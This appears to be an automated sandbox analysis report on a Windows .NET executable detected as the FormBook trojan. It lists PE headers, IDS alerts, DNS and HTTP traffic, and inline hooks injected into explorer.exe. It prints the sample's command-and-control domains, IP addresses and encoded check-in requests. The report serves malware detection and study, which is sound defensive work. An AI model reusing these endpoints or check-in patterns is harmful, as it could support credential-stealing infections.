                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb9ca40x57.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x46fa.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000xb7d040xb7e00False0.557449226717data5.60682914242IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xba0000x46fa0x4800False0.154405381944data2.48778714004IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xc00000xc0x200False0.041015625data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_ICON0xba1300x4028data
                                                                                          RT_GROUP_ICON0xbe1580x14data
                                                                                          RT_VERSION0xbe16c0x3a4data
                                                                                          RT_MANIFEST0xbe5100x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Version Infos

                                                                                          DescriptionData
                                                                                          Translation0x0000 0x04b0
                                                                                          LegalCopyrightCopyright 2005 4;@:9>CF>>5?A@<AE4D4
                                                                                          Assembly Version1.0.0.0
                                                                                          InternalNameIMG_155710.exe
                                                                                          FileVersion5.8.10.13
                                                                                          CompanyName4;@:9>CF>>5?A@<AE4D4
                                                                                          CommentsA7E@4HA4?@7HB;B98GH
                                                                                          ProductName56:53B29963AH9:F76>A
                                                                                          ProductVersion5.8.10.13
                                                                                          FileDescription56:53B29963AH9:F76>A
                                                                                          OriginalFilenameIMG_155710.exe

                                                                                          Network Behavior

                                                                                          Snort IDS Alerts

                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                          01/26/21-17:00:12.996209TCP1201ATTACK-RESPONSES 403 Forbidden804975034.102.136.180192.168.2.6
                                                                                          01/26/21-17:00:54.182765TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.6198.54.117.215
                                                                                          01/26/21-17:00:54.182765TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.6198.54.117.215
                                                                                          01/26/21-17:00:54.182765TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.6198.54.117.215
                                                                                          01/26/21-17:01:57.688028TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.6162.241.30.16
                                                                                          01/26/21-17:01:57.688028TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.6162.241.30.16
                                                                                          01/26/21-17:01:57.688028TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.6162.241.30.16

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 26, 2021 17:00:12.814466000 CET4975080192.168.2.634.102.136.180
                                                                                          Jan 26, 2021 17:00:12.857068062 CET804975034.102.136.180192.168.2.6
                                                                                          Jan 26, 2021 17:00:12.857337952 CET4975080192.168.2.634.102.136.180
                                                                                          Jan 26, 2021 17:00:12.857362032 CET4975080192.168.2.634.102.136.180
                                                                                          Jan 26, 2021 17:00:12.897577047 CET804975034.102.136.180192.168.2.6
                                                                                          Jan 26, 2021 17:00:12.996208906 CET804975034.102.136.180192.168.2.6
                                                                                          Jan 26, 2021 17:00:12.996234894 CET804975034.102.136.180192.168.2.6
                                                                                          Jan 26, 2021 17:00:12.996419907 CET4975080192.168.2.634.102.136.180
                                                                                          Jan 26, 2021 17:00:12.996989965 CET4975080192.168.2.634.102.136.180
                                                                                          Jan 26, 2021 17:00:13.038964987 CET804975034.102.136.180192.168.2.6
                                                                                          Jan 26, 2021 17:00:33.377145052 CET4975680192.168.2.668.183.162.131
                                                                                          Jan 26, 2021 17:00:33.572619915 CET804975668.183.162.131192.168.2.6
                                                                                          Jan 26, 2021 17:00:33.572856903 CET4975680192.168.2.668.183.162.131
                                                                                          Jan 26, 2021 17:00:33.572993994 CET4975680192.168.2.668.183.162.131
                                                                                          Jan 26, 2021 17:00:33.769326925 CET804975668.183.162.131192.168.2.6
                                                                                          Jan 26, 2021 17:00:33.769351959 CET804975668.183.162.131192.168.2.6
                                                                                          Jan 26, 2021 17:00:33.769365072 CET804975668.183.162.131192.168.2.6
                                                                                          Jan 26, 2021 17:00:33.769821882 CET4975680192.168.2.668.183.162.131
                                                                                          Jan 26, 2021 17:00:33.769942045 CET4975680192.168.2.668.183.162.131
                                                                                          Jan 26, 2021 17:00:33.965962887 CET804975668.183.162.131192.168.2.6
                                                                                          Jan 26, 2021 17:00:53.989685059 CET4975880192.168.2.6198.54.117.215
                                                                                          Jan 26, 2021 17:00:54.182435989 CET8049758198.54.117.215192.168.2.6
                                                                                          Jan 26, 2021 17:00:54.182614088 CET4975880192.168.2.6198.54.117.215
                                                                                          Jan 26, 2021 17:00:54.182765007 CET4975880192.168.2.6198.54.117.215
                                                                                          Jan 26, 2021 17:00:54.375332117 CET8049758198.54.117.215192.168.2.6
                                                                                          Jan 26, 2021 17:00:54.375354052 CET8049758198.54.117.215192.168.2.6

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 26, 2021 16:58:59.737405062 CET5602353192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:58:59.793910027 CET53560238.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:01.634555101 CET5838453192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:01.682532072 CET53583848.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:03.126521111 CET6026153192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:03.174284935 CET53602618.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:04.347095966 CET5606153192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:04.395015955 CET53560618.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:06.558878899 CET5833653192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:06.609677076 CET53583368.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:06.882843018 CET5378153192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:06.939060926 CET53537818.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:07.675842047 CET5406453192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:07.726490021 CET53540648.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:09.141752958 CET5281153192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:09.192516088 CET53528118.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:10.480093956 CET5529953192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:10.528147936 CET53552998.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:12.182248116 CET6374553192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:12.232950926 CET53637458.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:22.726092100 CET5005553192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:22.774058104 CET53500558.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:23.954519033 CET6137453192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:24.005290985 CET53613748.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:24.974210978 CET5033953192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:25.022103071 CET53503398.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:28.057495117 CET6330753192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:28.105453014 CET53633078.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:32.877170086 CET4969453192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:32.937530994 CET53496948.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:47.445007086 CET5498253192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:47.503876925 CET53549828.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:48.435337067 CET5001053192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:48.491889954 CET53500108.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:49.027430058 CET6371853192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:49.086314917 CET53637188.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:49.512528896 CET6211653192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:49.560516119 CET53621168.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:49.687978029 CET6381653192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:49.732337952 CET5501453192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:49.747180939 CET53638168.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:49.783117056 CET53550148.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:50.231868982 CET6220853192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:50.282481909 CET53622088.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:51.278779984 CET5757453192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:51.336147070 CET53575748.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:51.915112019 CET5181853192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:51.974304914 CET53518188.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:52.664999008 CET5662853192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:52.723587036 CET53566288.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:53.605007887 CET6077853192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:53.661519051 CET53607788.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:54.538484097 CET5379953192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:54.597676039 CET53537998.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:55.061053991 CET5468353192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:55.117429972 CET53546838.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 16:59:55.668350935 CET5932953192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 16:59:55.725994110 CET53593298.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 17:00:12.740839005 CET6402153192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 17:00:12.807508945 CET53640218.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 17:00:28.781791925 CET5612953192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 17:00:28.829874039 CET53561298.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 17:00:29.233709097 CET5817753192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 17:00:29.290179968 CET53581778.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 17:00:33.129590034 CET5070053192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 17:00:33.187967062 CET53507008.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 17:00:33.200325012 CET5406953192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 17:00:33.374711037 CET53540698.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 17:00:50.817951918 CET6117853192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 17:00:50.865824938 CET53611788.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 17:00:53.927881002 CET5701753192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 17:00:53.988415003 CET53570178.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 17:01:37.210289955 CET5632753192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 17:01:37.280924082 CET53563278.8.8.8192.168.2.6
                                                                                          Jan 26, 2021 17:01:57.442735910 CET5024353192.168.2.68.8.8.8
                                                                                          Jan 26, 2021 17:01:57.517740011 CET53502438.8.8.8192.168.2.6

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          Jan 26, 2021 17:00:12.740839005 CET192.168.2.68.8.8.80xc8c8Standard query (0)www.what3emoji.comA (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:33.200325012 CET192.168.2.68.8.8.80x750aStandard query (0)www.thehostingroad.comA (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:53.927881002 CET192.168.2.68.8.8.80x41ddStandard query (0)www.inifinityapps.netA (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:01:37.210289955 CET192.168.2.68.8.8.80x368dStandard query (0)www.akealuminum.comA (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:01:57.442735910 CET192.168.2.68.8.8.80xa7feStandard query (0)www.getyoursofa.comA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          Jan 26, 2021 17:00:12.807508945 CET8.8.8.8192.168.2.60xc8c8No error (0)www.what3emoji.comwhat3emoji.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:12.807508945 CET8.8.8.8192.168.2.60xc8c8No error (0)what3emoji.com34.102.136.180A (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:33.374711037 CET8.8.8.8192.168.2.60x750aNo error (0)www.thehostingroad.comthehostingroad.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:33.374711037 CET8.8.8.8192.168.2.60x750aNo error (0)thehostingroad.com68.183.162.131A (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:53.988415003 CET8.8.8.8192.168.2.60x41ddNo error (0)www.inifinityapps.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:53.988415003 CET8.8.8.8192.168.2.60x41ddNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:53.988415003 CET8.8.8.8192.168.2.60x41ddNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:53.988415003 CET8.8.8.8192.168.2.60x41ddNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:53.988415003 CET8.8.8.8192.168.2.60x41ddNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:53.988415003 CET8.8.8.8192.168.2.60x41ddNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:53.988415003 CET8.8.8.8192.168.2.60x41ddNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:00:53.988415003 CET8.8.8.8192.168.2.60x41ddNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:01:37.280924082 CET8.8.8.8192.168.2.60x368dServer failure (2)www.akealuminum.comnonenoneA (IP address)IN (0x0001)
                                                                                          Jan 26, 2021 17:01:57.517740011 CET8.8.8.8192.168.2.60xa7feNo error (0)www.getyoursofa.com162.241.30.16A (IP address)IN (0x0001)

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.what3emoji.com
                                                                                          • www.thehostingroad.com
                                                                                          • www.inifinityapps.net

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.64975034.102.136.18080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jan 26, 2021 17:00:12.857362032 CET5589OUTGET /bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV HTTP/1.1
                                                                                          Host: www.what3emoji.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jan 26, 2021 17:00:12.996208906 CET5589INHTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Tue, 26 Jan 2021 16:00:12 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 275
                                                                                          ETag: "600b4d46-113"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          1192.168.2.64975668.183.162.13180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jan 26, 2021 17:00:33.572993994 CET5614OUTGET /bf3/?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV HTTP/1.1
                                                                                          Host: www.thehostingroad.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jan 26, 2021 17:00:33.769351959 CET5616INHTTP/1.1 302 Found
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 682
                                                                                          Date: Tue, 26 Jan 2021 16:00:33 GMT
                                                                                          Server: LiteSpeed
                                                                                          Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                          Location: http://www.thehostingroad.com/cgi-sys/suspendedpage.cgi?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV
                                                                                          Vary: User-Agent
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          2192.168.2.649758198.54.117.21580C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jan 26, 2021 17:00:54.182765007 CET5628OUTGET /bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV HTTP/1.1
                                                                                          Host: www.inifinityapps.net
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:


                                                                                          Code Manipulations

                                                                                          User Modules

                                                                                          Hook Summary

                                                                                          Function NameHook TypeActive in Processes
                                                                                          PeekMessageAINLINEexplorer.exe
                                                                                          PeekMessageWINLINEexplorer.exe
                                                                                          GetMessageWINLINEexplorer.exe
                                                                                          GetMessageAINLINEexplorer.exe

                                                                                          Processes

                                                                                          Process: explorer.exe, Module: user32.dll
                                                                                          Function NameHook TypeNew Data
                                                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEA
                                                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEA
                                                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEA
                                                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEA

                                                                                          Statistics

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Start time:16:59:04
                                                                                          Start date:26/01/2021
                                                                                          Path:C:\Users\user\Desktop\bXFjrxjRlb.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\Desktop\bXFjrxjRlb.exe'
                                                                                          Imagebase:0x110000
